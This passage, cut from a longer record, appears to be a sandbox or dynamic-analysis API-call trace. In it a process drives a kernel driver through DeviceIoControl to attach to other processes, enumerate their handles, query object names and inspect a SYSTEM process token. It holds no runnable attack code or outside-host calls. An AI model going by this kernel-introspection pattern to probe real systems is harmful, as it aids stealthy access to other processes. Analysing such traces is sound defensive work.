| out: ObjectNameInfo=0xfffffa8002947044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.674] ObfDereferenceObject (Object=0xfffffa8003781dd0) returned 0x1 [0136.674] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.674] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.674] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.674] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0136.674] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.674] PsAcquireProcessExitSynchronization () returned 0x0 [0136.674] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0136.674] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036c0070, HandleInformation=0x0) returned 0x0 [0136.674] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.674] PsReleaseProcessExitSynchronization () returned 0x2 [0136.674] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3e [0136.675] ObQueryNameString (in: Object=0xfffffa80036c0070, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.675] ObfDereferenceObject (Object=0xfffffa80036c0070) returned 0x11 [0136.675] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.675] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x250) returned 0xc8 [0136.675] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0136.675] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80036f9b30, HandleInformation=0x0) returned 0x0 [0136.675] ObOpenObjectByPointer (in: Object=0xfffffa80036f9b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0136.675] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x84 [0136.675] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8010170480 | out: TokenHandle=0xfffffa8010170480*=0xc4) returned 0x0 [0136.675] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0136.675] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.676] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0136.676] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0136.678] CloseHandle (hObject=0xc4) returned 1 [0136.678] CloseHandle (hObject=0xc8) returned 1 [0136.678] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.678] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.679] PsAcquireProcessExitSynchronization () returned 0x0 [0136.679] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.679] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036f6e00, HandleInformation=0x0) returned 0x0 [0136.679] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.679] PsReleaseProcessExitSynchronization () returned 0x2 [0136.679] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.679] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.679] ObfDereferenceObject (Object=0xfffffa80036f6e00) returned 0x1 [0136.679] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.679] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.679] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.680] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.680] PsAcquireProcessExitSynchronization () returned 0x0 [0136.680] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.680] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003719c10, HandleInformation=0x0) returned 0x0 [0136.680] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.680] PsReleaseProcessExitSynchronization () returned 0x2 [0136.680] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.680] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002aee044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002aee044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.680] ObfDereferenceObject (Object=0xfffffa8003719c10) returned 0x1 [0136.680] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.680] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.680] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0136.681] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.681] PsAcquireProcessExitSynchronization () returned 0x0 [0136.681] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.681] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800370fa20, HandleInformation=0x0) returned 0x0 [0136.681] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.681] PsReleaseProcessExitSynchronization () returned 0x2 [0136.681] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.681] ObQueryNameString (in: Object=0xfffffa800370fa20, ObjectNameInfo=0xfffffa8002aed044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002aed044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.681] ObfDereferenceObject (Object=0xfffffa800370fa20) returned 0x1 [0136.681] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.682] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.682] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0136.682] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.682] PsAcquireProcessExitSynchronization () returned 0x0 [0136.682] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.682] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003710f20, HandleInformation=0x0) returned 0x0 [0136.682] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.682] PsReleaseProcessExitSynchronization () returned 0x2 [0136.682] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.682] ObQueryNameString (in: Object=0xfffffa8003710f20, ObjectNameInfo=0xfffffa8002ed6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ed6044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.682] ObfDereferenceObject (Object=0xfffffa8003710f20) returned 0x2 [0136.682] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.683] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.683] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.683] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0136.683] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.683] PsAcquireProcessExitSynchronization () returned 0x0 [0136.683] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.683] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003710dd0, HandleInformation=0x0) returned 0x0 [0136.683] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.683] PsReleaseProcessExitSynchronization () returned 0x2 [0136.683] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.683] ObQueryNameString (in: Object=0xfffffa8003710dd0, ObjectNameInfo=0xfffffa8002ee3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee3044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.683] ObfDereferenceObject (Object=0xfffffa8003710dd0) returned 0x1 [0136.683] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.684] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.684] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.684] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.684] PsAcquireProcessExitSynchronization () returned 0x0 [0136.684] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.684] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800371cce0, HandleInformation=0x0) returned 0x0 [0136.684] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.684] PsReleaseProcessExitSynchronization () returned 0x2 [0136.684] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.684] ObQueryNameString (in: Object=0xfffffa800371cce0, ObjectNameInfo=0xfffffa8002ee5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee5044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.684] ObfDereferenceObject (Object=0xfffffa800371cce0) returned 0x1 [0136.684] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.685] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.685] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0136.685] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.685] PsAcquireProcessExitSynchronization () returned 0x0 [0136.685] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.685] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0136.685] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.686] PsReleaseProcessExitSynchronization () returned 0x2 [0136.686] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.686] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.686] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0136.686] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.686] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.686] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0136.686] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.686] PsAcquireProcessExitSynchronization () returned 0x0 [0136.686] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.686] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0136.686] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.686] PsReleaseProcessExitSynchronization () returned 0x2 [0136.686] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.686] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa8002eeb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002eeb044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.687] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0136.687] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.687] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.687] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0136.687] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.687] PsAcquireProcessExitSynchronization () returned 0x0 [0136.687] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.687] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c03fc0, HandleInformation=0x0) returned 0x0 [0136.687] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.687] PsReleaseProcessExitSynchronization () returned 0x2 [0136.687] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.687] ObQueryNameString (in: Object=0xfffff8a000c03fc0, ObjectNameInfo=0xfffffa8002ef9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ef9044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.688] ObfDereferenceObject (Object=0xfffff8a000c03fc0) returned 0x2 [0136.688] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.688] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.688] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.688] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0136.688] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.688] PsAcquireProcessExitSynchronization () returned 0x0 [0136.688] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.688] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0136.688] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.688] PsReleaseProcessExitSynchronization () returned 0x2 [0136.688] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.689] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f0a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0a044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.689] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0136.689] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.689] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.689] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0136.689] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.689] PsAcquireProcessExitSynchronization () returned 0x0 [0136.689] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.689] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0136.689] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.689] PsReleaseProcessExitSynchronization () returned 0x2 [0136.689] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.689] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f10044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f10044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.689] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0136.690] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.690] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0136.690] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.690] PsAcquireProcessExitSynchronization () returned 0x0 [0136.690] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.690] ObReferenceObjectByHandle (in: Handle=0x508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0136.690] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.690] PsReleaseProcessExitSynchronization () returned 0x2 [0136.690] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.690] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f12044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f12044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.690] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0136.690] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.690] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0136.691] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.691] PsAcquireProcessExitSynchronization () returned 0x0 [0136.691] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880051635d0) [0136.691] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800e2e78e0, HandleInformation=0x0) returned 0x0 [0136.691] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.691] PsReleaseProcessExitSynchronization () returned 0x2 [0136.691] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x82 [0136.691] ObQueryNameString (in: Object=0xfffffa800e2e78e0, ObjectNameInfo=0xfffffa8002f13044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f13044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.691] ObfDereferenceObject (Object=0xfffffa800e2e78e0) returned 0x11 [0136.692] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.692] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.692] OpenProcess 